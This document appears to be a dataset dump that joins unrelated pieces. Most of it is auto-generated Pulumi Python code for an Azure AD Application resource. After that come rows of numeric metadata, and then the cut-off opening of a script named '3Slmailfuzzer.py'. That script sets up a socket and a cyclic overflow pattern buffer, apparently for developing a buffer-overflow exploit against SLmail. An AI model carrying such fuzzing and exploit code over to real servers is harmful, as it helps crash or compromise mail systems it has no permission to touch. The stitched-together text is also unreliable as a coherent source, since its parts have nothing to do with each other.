:param pulumi.Input[pulumi.InputType['ApplicationApiArgs']] api: An `api` block as documented below, which configures API related settings for this application.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationAppRoleArgs']]]] app_roles: A collection of `app_role` blocks as documented below. For more information see [official documentation on Application Roles](https://docs.microsoft.com/en-us/azure/architecture/multitenant-identity/app-roles).
:param pulumi.Input[bool] device_only_auth_enabled: Specifies whether this application supports device authentication without a user. Defaults to `false`.
:param pulumi.Input[str] display_name: The display name for the application.
:param pulumi.Input[bool] fallback_public_client_enabled: Specifies whether the application is a public client. Appropriate for apps using token grant flows that don't use a redirect URI. Defaults to `false`.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationFeatureTagArgs']]]] feature_tags: A `feature_tags` block as described below. Cannot be used together with the `tags` property.
:param pulumi.Input[Sequence[pulumi.Input[str]]] group_membership_claims: Configures the `groups` claim issued in a user or OAuth 2.0 access token that the app expects. Possible values are `None`, `SecurityGroup`, `DirectoryRole`, `ApplicationGroup` or `All`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] identifier_uris: A set of user-defined URI(s) that uniquely identify an application within its Azure AD tenant, or within a verified custom domain if the application is multi-tenant.
:param pulumi.Input[str] logo_image: A logo image to upload for the application, as a raw base64-encoded string. The image should be in gif, jpeg or png format. Note that once an image has been uploaded, it is not possible to remove it without replacing it with another image.
:param pulumi.Input[str] marketing_url: URL of the application's marketing page.
:param pulumi.Input[bool] oauth2_post_response_required: Specifies whether, as part of OAuth 2.0 token requests, Azure AD allows POST requests, as opposed to GET requests. Defaults to `false`, which specifies that only GET requests are allowed.
:param pulumi.Input[pulumi.InputType['ApplicationOptionalClaimsArgs']] optional_claims: An `optional_claims` block as documented below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] owners: A set of object IDs of principals that will be granted ownership of the application. Supported object types are users or service principals. By default, no owners are assigned.
:param pulumi.Input[bool] prevent_duplicate_names: If `true`, will return an error if an existing application is found with the same name. Defaults to `false`.
:param pulumi.Input[str] privacy_statement_url: URL of the application's privacy statement.
:param pulumi.Input[pulumi.InputType['ApplicationPublicClientArgs']] public_client: A `public_client` block as documented below, which configures non-web app or non-web API application settings, for example mobile or other public clients such as an installed application running on a desktop device.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationRequiredResourceAccessArgs']]]] required_resource_accesses: A collection of `required_resource_access` blocks as documented below.
:param pulumi.Input[str] sign_in_audience: The Microsoft account types that are supported for the current application. Must be one of `AzureADMyOrg`, `AzureADMultipleOrgs`, `AzureADandPersonalMicrosoftAccount` or `PersonalMicrosoftAccount`. Defaults to `AzureADMyOrg`.
:param pulumi.Input[pulumi.InputType['ApplicationSinglePageApplicationArgs']] single_page_application: A `single_page_application` block as documented below, which configures single-page application (SPA) related settings for this application.
:param pulumi.Input[str] support_url: URL of the application's support page.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A set of tags to apply to the application. Cannot be used together with the `feature_tags` block.
:param pulumi.Input[str] template_id: Unique ID for a templated application in the Azure AD App Gallery, from which to create the application. Changing this forces a new resource to be created.
:param pulumi.Input[str] terms_of_service_url: URL of the application's terms of service statement.
:param pulumi.Input[pulumi.InputType['ApplicationWebArgs']] web: A `web` block as documented below, which configures web related settings for this application.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ApplicationArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
## Import
Applications can be imported using their object ID, e.g.
```sh
$ pulumi import azuread:index/application:Application test 00000000-0000-0000-0000-000000000000
```
:param str resource_name: The name of the resource.
:param ApplicationArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ApplicationArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
api: Optional[pulumi.Input[pulumi.InputType['ApplicationApiArgs']]] = None,
app_roles: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationAppRoleArgs']]]]] = None,
device_only_auth_enabled: Optional[pulumi.Input[bool]] = None,
display_name: Optional[pulumi.Input[str]] = None,
fallback_public_client_enabled: Optional[pulumi.Input[bool]] = None,
feature_tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationFeatureTagArgs']]]]] = None,
group_membership_claims: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
identifier_uris: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
logo_image: Optional[pulumi.Input[str]] = None,
marketing_url: Optional[pulumi.Input[str]] = None,
oauth2_post_response_required: Optional[pulumi.Input[bool]] = None,
optional_claims: Optional[pulumi.Input[pulumi.InputType['ApplicationOptionalClaimsArgs']]] = None,
owners: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
prevent_duplicate_names: Optional[pulumi.Input[bool]] = None,
privacy_statement_url: Optional[pulumi.Input[str]] = None,
public_client: Optional[pulumi.Input[pulumi.InputType['ApplicationPublicClientArgs']]] = None,
required_resource_accesses: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationRequiredResourceAccessArgs']]]]] = None,
sign_in_audience: Optional[pulumi.Input[str]] = None,
single_page_application: Optional[pulumi.Input[pulumi.InputType['ApplicationSinglePageApplicationArgs']]] = None,
support_url: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
template_id: Optional[pulumi.Input[str]] = None,
terms_of_service_url: Optional[pulumi.Input[str]] = None,
web: Optional[pulumi.Input[pulumi.InputType['ApplicationWebArgs']]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ApplicationArgs.__new__(ApplicationArgs)
__props__.__dict__["api"] = api
__props__.__dict__["app_roles"] = app_roles
__props__.__dict__["device_only_auth_enabled"] = device_only_auth_enabled
if display_name is None and not opts.urn:
raise TypeError("Missing required property 'display_name'")
__props__.__dict__["display_name"] = display_name
__props__.__dict__["fallback_public_client_enabled"] = fallback_public_client_enabled
__props__.__dict__["feature_tags"] = feature_tags
__props__.__dict__["group_membership_claims"] = group_membership_claims
__props__.__dict__["identifier_uris"] = identifier_uris
__props__.__dict__["logo_image"] = logo_image
__props__.__dict__["marketing_url"] = marketing_url
__props__.__dict__["oauth2_post_response_required"] = oauth2_post_response_required
__props__.__dict__["optional_claims"] = optional_claims
__props__.__dict__["owners"] = owners
__props__.__dict__["prevent_duplicate_names"] = prevent_duplicate_names
__props__.__dict__["privacy_statement_url"] = privacy_statement_url
__props__.__dict__["public_client"] = public_client
__props__.__dict__["required_resource_accesses"] = required_resource_accesses
__props__.__dict__["sign_in_audience"] = sign_in_audience
__props__.__dict__["single_page_application"] = single_page_application
__props__.__dict__["support_url"] = support_url
__props__.__dict__["tags"] = tags
__props__.__dict__["template_id"] = template_id
__props__.__dict__["terms_of_service_url"] = terms_of_service_url
__props__.__dict__["web"] = web
__props__.__dict__["app_role_ids"] = None
__props__.__dict__["application_id"] = None
__props__.__dict__["disabled_by_microsoft"] = None
__props__.__dict__["logo_url"] = None
__props__.__dict__["oauth2_permission_scope_ids"] = None
__props__.__dict__["object_id"] = None
__props__.__dict__["publisher_domain"] = None
super(Application, __self__).__init__(
'azuread:index/application:Application',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
api: Optional[pulumi.Input[pulumi.InputType['ApplicationApiArgs']]] = None,
app_role_ids: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
app_roles: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationAppRoleArgs']]]]] = None,
application_id: Optional[pulumi.Input[str]] = None,
device_only_auth_enabled: Optional[pulumi.Input[bool]] = None,
disabled_by_microsoft: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
fallback_public_client_enabled: Optional[pulumi.Input[bool]] = None,
feature_tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationFeatureTagArgs']]]]] = None,
group_membership_claims: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
identifier_uris: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
logo_image: Optional[pulumi.Input[str]] = None,
logo_url: Optional[pulumi.Input[str]] = None,
marketing_url: Optional[pulumi.Input[str]] = None,
oauth2_permission_scope_ids: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
oauth2_post_response_required: Optional[pulumi.Input[bool]] = None,
object_id: Optional[pulumi.Input[str]] = None,
optional_claims: Optional[pulumi.Input[pulumi.InputType['ApplicationOptionalClaimsArgs']]] = None,
owners: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
prevent_duplicate_names: Optional[pulumi.Input[bool]] = None,
privacy_statement_url: Optional[pulumi.Input[str]] = None,
public_client: Optional[pulumi.Input[pulumi.InputType['ApplicationPublicClientArgs']]] = None,
publisher_domain: Optional[pulumi.Input[str]] = None,
required_resource_accesses: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationRequiredResourceAccessArgs']]]]] = None,
sign_in_audience: Optional[pulumi.Input[str]] = None,
single_page_application: Optional[pulumi.Input[pulumi.InputType['ApplicationSinglePageApplicationArgs']]] = None,
support_url: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
template_id: Optional[pulumi.Input[str]] = None,
terms_of_service_url: Optional[pulumi.Input[str]] = None,
web: Optional[pulumi.Input[pulumi.InputType['ApplicationWebArgs']]] = None) -> 'Application':
"""
Get an existing Application resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['ApplicationApiArgs']] api: An `api` block as documented below, which configures API related settings for this application.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] app_role_ids: A mapping of app role values to app role IDs, intended to be useful when referencing app roles in other resources in your configuration.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationAppRoleArgs']]]] app_roles: A collection of `app_role` blocks as documented below. For more information see [official documentation on Application Roles](https://docs.microsoft.com/en-us/azure/architecture/multitenant-identity/app-roles).
:param pulumi.Input[str] application_id: The Application ID (also called Client ID).
:param pulumi.Input[bool] device_only_auth_enabled: Specifies whether this application supports device authentication without a user. Defaults to `false`.
:param pulumi.Input[str] disabled_by_microsoft: Whether Microsoft has disabled the registered application. If the application is disabled, this will be a string indicating the status/reason, e.g. `DisabledDueToViolationOfServicesAgreement`
:param pulumi.Input[str] display_name: The display name for the application.
:param pulumi.Input[bool] fallback_public_client_enabled: Specifies whether the application is a public client. Appropriate for apps using token grant flows that don't use a redirect URI. Defaults to `false`.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationFeatureTagArgs']]]] feature_tags: A `feature_tags` block as described below. Cannot be used together with the `tags` property.
:param pulumi.Input[Sequence[pulumi.Input[str]]] group_membership_claims: Configures the `groups` claim issued in a user or OAuth 2.0 access token that the app expects. Possible values are `None`, `SecurityGroup`, `DirectoryRole`, `ApplicationGroup` or `All`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] identifier_uris: A set of user-defined URI(s) that uniquely identify an application within its Azure AD tenant, or within a verified custom domain if the application is multi-tenant.
:param pulumi.Input[str] logo_image: A logo image to upload for the application, as a raw base64-encoded string. The image should be in gif, jpeg or png format. Note that once an image has been uploaded, it is not possible to remove it without replacing it with another image.
:param pulumi.Input[str] logo_url: CDN URL to the application's logo, as uploaded with the `logo_image` property.
:param pulumi.Input[str] marketing_url: URL of the application's marketing page.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] oauth2_permission_scope_ids: A mapping of OAuth2.0 permission scope values to scope IDs, intended to be useful when referencing permission scopes in other resources in your configuration.
:param pulumi.Input[bool] oauth2_post_response_required: Specifies whether, as part of OAuth 2.0 token requests, Azure AD allows POST requests, as opposed to GET requests. Defaults to `false`, which specifies that only GET requests are allowed.
:param pulumi.Input[str] object_id: The application's object ID.
:param pulumi.Input[pulumi.InputType['ApplicationOptionalClaimsArgs']] optional_claims: An `optional_claims` block as documented below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] owners: A set of object IDs of principals that will be granted ownership of the application. Supported object types are users or service principals. By default, no owners are assigned.
:param pulumi.Input[bool] prevent_duplicate_names: If `true`, will return an error if an existing application is found with the same name. Defaults to `false`.
:param pulumi.Input[str] privacy_statement_url: URL of the application's privacy statement.
:param pulumi.Input[pulumi.InputType['ApplicationPublicClientArgs']] public_client: A `public_client` block as documented below, which configures non-web app or non-web API application settings, for example mobile or other public clients such as an installed application running on a desktop device.
:param pulumi.Input[str] publisher_domain: The verified publisher domain for the application.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationRequiredResourceAccessArgs']]]] required_resource_accesses: A collection of `required_resource_access` blocks as documented below.
:param pulumi.Input[str] sign_in_audience: The Microsoft account types that are supported for the current application. Must be one of `AzureADMyOrg`, `AzureADMultipleOrgs`, `AzureADandPersonalMicrosoftAccount` or `PersonalMicrosoftAccount`. Defaults to `AzureADMyOrg`.
:param pulumi.Input[pulumi.InputType['ApplicationSinglePageApplicationArgs']] single_page_application: A `single_page_application` block as documented below, which configures single-page application (SPA) related settings for this application.
:param pulumi.Input[str] support_url: URL of the application's support page.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A set of tags to apply to the application. Cannot be used together with the `feature_tags` block.
:param pulumi.Input[str] template_id: Unique ID for a templated application in the Azure AD App Gallery, from which to create the application. Changing this forces a new resource to be created.
:param pulumi.Input[str] terms_of_service_url: URL of the application's terms of service statement.
:param pulumi.Input[pulumi.InputType['ApplicationWebArgs']] web: A `web` block as documented below, which configures web related settings for this application.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ApplicationState.__new__(_ApplicationState)
__props__.__dict__["api"] = api
__props__.__dict__["app_role_ids"] = app_role_ids
__props__.__dict__["app_roles"] = app_roles
__props__.__dict__["application_id"] = application_id
__props__.__dict__["device_only_auth_enabled"] = device_only_auth_enabled
__props__.__dict__["disabled_by_microsoft"] = disabled_by_microsoft
__props__.__dict__["display_name"] = display_name
__props__.__dict__["fallback_public_client_enabled"] = fallback_public_client_enabled
__props__.__dict__["feature_tags"] = feature_tags
__props__.__dict__["group_membership_claims"] = group_membership_claims
__props__.__dict__["identifier_uris"] = identifier_uris
__props__.__dict__["logo_image"] = logo_image
__props__.__dict__["logo_url"] = logo_url
__props__.__dict__["marketing_url"] = marketing_url
__props__.__dict__["oauth2_permission_scope_ids"] = oauth2_permission_scope_ids
__props__.__dict__["oauth2_post_response_required"] = oauth2_post_response_required
__props__.__dict__["object_id"] = object_id
__props__.__dict__["optional_claims"] = optional_claims
__props__.__dict__["owners"] = owners
__props__.__dict__["prevent_duplicate_names"] = prevent_duplicate_names
__props__.__dict__["privacy_statement_url"] = privacy_statement_url
__props__.__dict__["public_client"] = public_client
__props__.__dict__["publisher_domain"] = publisher_domain
__props__.__dict__["required_resource_accesses"] = required_resource_accesses
__props__.__dict__["sign_in_audience"] = sign_in_audience
__props__.__dict__["single_page_application"] = single_page_application
__props__.__dict__["support_url"] = support_url
__props__.__dict__["tags"] = tags
__props__.__dict__["template_id"] = template_id
__props__.__dict__["terms_of_service_url"] = terms_of_service_url
__props__.__dict__["web"] = web
return Application(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def api(self) -> pulumi.Output[Optional['outputs.ApplicationApi']]:
"""
An `api` block as documented below, which configures API related settings for this application.
"""
return pulumi.get(self, "api")
@property
@pulumi.getter(name="appRoleIds")
def app_role_ids(self) -> pulumi.Output[Mapping[str, str]]:
"""
A mapping of app role values to app role IDs, intended to be useful when referencing app roles in other resources in your configuration.
"""
return pulumi.get(self, "app_role_ids")
@property
@pulumi.getter(name="appRoles")
def app_roles(self) -> pulumi.Output[Optional[Sequence['outputs.ApplicationAppRole']]]:
"""
A collection of `app_role` blocks as documented below. For more information see [official documentation on Application Roles](https://docs.microsoft.com/en-us/azure/architecture/multitenant-identity/app-roles).
"""
return pulumi.get(self, "app_roles")
@property
@pulumi.getter(name="applicationId")
def application_id(self) -> pulumi.Output[str]:
"""
The Application ID (also called Client ID).
"""
return pulumi.get(self, "application_id")
@property
@pulumi.getter(name="deviceOnlyAuthEnabled")
def device_only_auth_enabled(self) -> pulumi.Output[Optional[bool]]:
"""
Specifies whether this application supports device authentication without a user. Defaults to `false`.
"""
return pulumi.get(self, "device_only_auth_enabled")
@property
@pulumi.getter(name="disabledByMicrosoft")
def disabled_by_microsoft(self) -> pulumi.Output[str]:
"""
Whether Microsoft has disabled the registered application. If the application is disabled, this will be a string indicating the status/reason, e.g. `DisabledDueToViolationOfServicesAgreement`
"""
return pulumi.get(self, "disabled_by_microsoft")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[str]:
"""
The display name for the application.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter(name="fallbackPublicClientEnabled")
def fallback_public_client_enabled(self) -> pulumi.Output[Optional[bool]]:
"""
Specifies whether the application is a public client. Appropriate for apps using token grant flows that don't use a redirect URI. Defaults to `false`.
"""
return pulumi.get(self, "fallback_public_client_enabled")
@property
@pulumi.getter(name="featureTags")
def feature_tags(self) -> pulumi.Output[Sequence['outputs.ApplicationFeatureTag']]:
"""
A `feature_tags` block as described below. Cannot be used together with the `tags` property.
"""
return pulumi.get(self, "feature_tags")
@property
@pulumi.getter(name="groupMembershipClaims")
def group_membership_claims(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
Configures the `groups` claim issued in a user or OAuth 2.0 access token that the app expects. Possible values are `None`, `SecurityGroup`, `DirectoryRole`, `ApplicationGroup` or `All`.
"""
return pulumi.get(self, "group_membership_claims")
@property
@pulumi.getter(name="identifierUris")
def identifier_uris(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A set of user-defined URI(s) that uniquely identify an application within its Azure AD tenant, or within a verified custom domain if the application is multi-tenant.
"""
return pulumi.get(self, "identifier_uris")
@property
@pulumi.getter(name="logoImage")
def logo_image(self) -> pulumi.Output[Optional[str]]:
"""
A logo image to upload for the application, as a raw base64-encoded string. The image should be in gif, jpeg or png format. Note that once an image has been uploaded, it is not possible to remove it without replacing it with another image.
"""
return pulumi.get(self, "logo_image")
@property
@pulumi.getter(name="logoUrl")
def logo_url(self) -> pulumi.Output[str]:
"""
CDN URL to the application's logo, as uploaded with the `logo_image` property.
"""
return pulumi.get(self, "logo_url")
@property
@pulumi.getter(name="marketingUrl")
def marketing_url(self) -> pulumi.Output[Optional[str]]:
"""
URL of the application's marketing page.
"""
return pulumi.get(self, "marketing_url")
@property
@pulumi.getter(name="oauth2PermissionScopeIds")
def oauth2_permission_scope_ids(self) -> pulumi.Output[Mapping[str, str]]:
"""
A mapping of OAuth2.0 permission scope values to scope IDs, intended to be useful when referencing permission scopes in other resources in your configuration.
"""
return pulumi.get(self, "oauth2_permission_scope_ids")
@property
@pulumi.getter(name="oauth2PostResponseRequired")
def oauth2_post_response_required(self) -> pulumi.Output[Optional[bool]]:
"""
Specifies whether, as part of OAuth 2.0 token requests, Azure AD allows POST requests, as opposed to GET requests. Defaults to `false`, which specifies that only GET requests are allowed.
"""
return pulumi.get(self, "oauth2_post_response_required")
@property
@pulumi.getter(name="objectId")
def object_id(self) -> pulumi.Output[str]:
"""
The application's object ID.
"""
return pulumi.get(self, "object_id")
@property
@pulumi.getter(name="optionalClaims")
def optional_claims(self) -> pulumi.Output[Optional['outputs.ApplicationOptionalClaims']]:
"""
An `optional_claims` block as documented below.
"""
return pulumi.get(self, "optional_claims")
@property
@pulumi.getter
def owners(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A set of object IDs of principals that will be granted ownership of the application. Supported object types are users or service principals. By default, no owners are assigned.
"""
return pulumi.get(self, "owners")
@property
@pulumi.getter(name="preventDuplicateNames")
def prevent_duplicate_names(self) -> pulumi.Output[Optional[bool]]:
"""
If `true`, will return an error if an existing application is found with the same name. Defaults to `false`.
"""
return pulumi.get(self, "prevent_duplicate_names")
@property
@pulumi.getter(name="privacyStatementUrl")
def privacy_statement_url(self) -> pulumi.Output[Optional[str]]:
"""
URL of the application's privacy statement.
"""
return pulumi.get(self, "privacy_statement_url")
@property
@pulumi.getter(name="publicClient")
def public_client(self) -> pulumi.Output[Optional['outputs.ApplicationPublicClient']]:
"""
A `public_client` block as documented below, which configures non-web app or non-web API application settings, for example mobile or other public clients such as an installed application running on a desktop device.
"""
return pulumi.get(self, "public_client")
@property
@pulumi.getter(name="publisherDomain")
def publisher_domain(self) -> pulumi.Output[str]:
"""
The verified publisher domain for the application.
"""
return pulumi.get(self, "publisher_domain")
@property
@pulumi.getter(name="requiredResourceAccesses")
def required_resource_accesses(self) -> pulumi.Output[Optional[Sequence['outputs.ApplicationRequiredResourceAccess']]]:
"""
A collection of `required_resource_access` blocks as documented below.
"""
return pulumi.get(self, "required_resource_accesses")
@property
@pulumi.getter(name="signInAudience")
def sign_in_audience(self) -> pulumi.Output[Optional[str]]:
"""
The Microsoft account types that are supported for the current application. Must be one of `AzureADMyOrg`, `AzureADMultipleOrgs`, `AzureADandPersonalMicrosoftAccount` or `PersonalMicrosoftAccount`. Defaults to `AzureADMyOrg`.
"""
return pulumi.get(self, "sign_in_audience")
@property
@pulumi.getter(name="singlePageApplication")
def single_page_application(self) -> pulumi.Output[Optional['outputs.ApplicationSinglePageApplication']]:
"""
A `single_page_application` block as documented below, which configures single-page application (SPA) related settings for this application.
"""
return pulumi.get(self, "single_page_application")
@property
@pulumi.getter(name="supportUrl")
def support_url(self) -> pulumi.Output[Optional[str]]:
"""
URL of the application's support page.
"""
return pulumi.get(self, "support_url")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Sequence[str]]:
"""
A set of tags to apply to the application. Cannot be used together with the `feature_tags` block.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="templateId")
def template_id(self) -> pulumi.Output[str]:
"""
Unique ID for a templated application in the Azure AD App Gallery, from which to create the application. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "template_id")
@property
@pulumi.getter(name="termsOfServiceUrl")
def terms_of_service_url(self) -> pulumi.Output[Optional[str]]:
"""
URL of the application's terms of service statement.
"""
return pulumi.get(self, "terms_of_service_url")
@property
@pulumi.getter
def web(self) -> pulumi.Output[Optional['outputs.ApplicationWeb']]:
"""
A `web` block as documented below, which configures web related settings for this application.
"""
return pulumi.get(self, "web")
| 58.672917
| 317
| 0.700245
| 10,205
| 84,489
| 5.584713
| 0.037139
| 0.088977
| 0.080345
| 0.039918
| 0.960012
| 0.948063
| 0.939974
| 0.932131
| 0.926867
| 0.906724
| 0
| 0.002489
| 0.201032
| 84,489
| 1,439
| 318
| 58.71369
| 0.841787
| 0.373623
| 0
| 0.843429
| 1
| 0
| 0.152001
| 0.089843
| 0
| 0
| 0
| 0
| 0
| 1
| 0.169143
| false
| 0.001143
| 0.008
| 0
| 0.28
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
53930622e594b5c73e5c4b94b97cf6a64d9763e5
| 3,087
|
py
|
Python
|
application/scripts/3Slmailfuzzer.py
|
cys3c/viper-shell
|
e05a07362b7d1e6d73c302a24d2506846e43502c
|
[
"PSF-2.0",
"BSD-2-Clause"
] | 2
|
2018-06-30T03:21:30.000Z
|
2020-03-22T02:31:02.000Z
|
application/scripts/3Slmailfuzzer.py
|
cys3c/viper-shell
|
e05a07362b7d1e6d73c302a24d2506846e43502c
|
[
"PSF-2.0",
"BSD-2-Clause"
] | null | null | null |
application/scripts/3Slmailfuzzer.py
|
cys3c/viper-shell
|
e05a07362b7d1e6d73c302a24d2506846e43502c
|
[
"PSF-2.0",
"BSD-2-Clause"
] | 3
|
2017-11-15T11:08:20.000Z
|
2020-03-22T02:31:03.000Z
|
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#buffer = 'A' * 2700
buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2C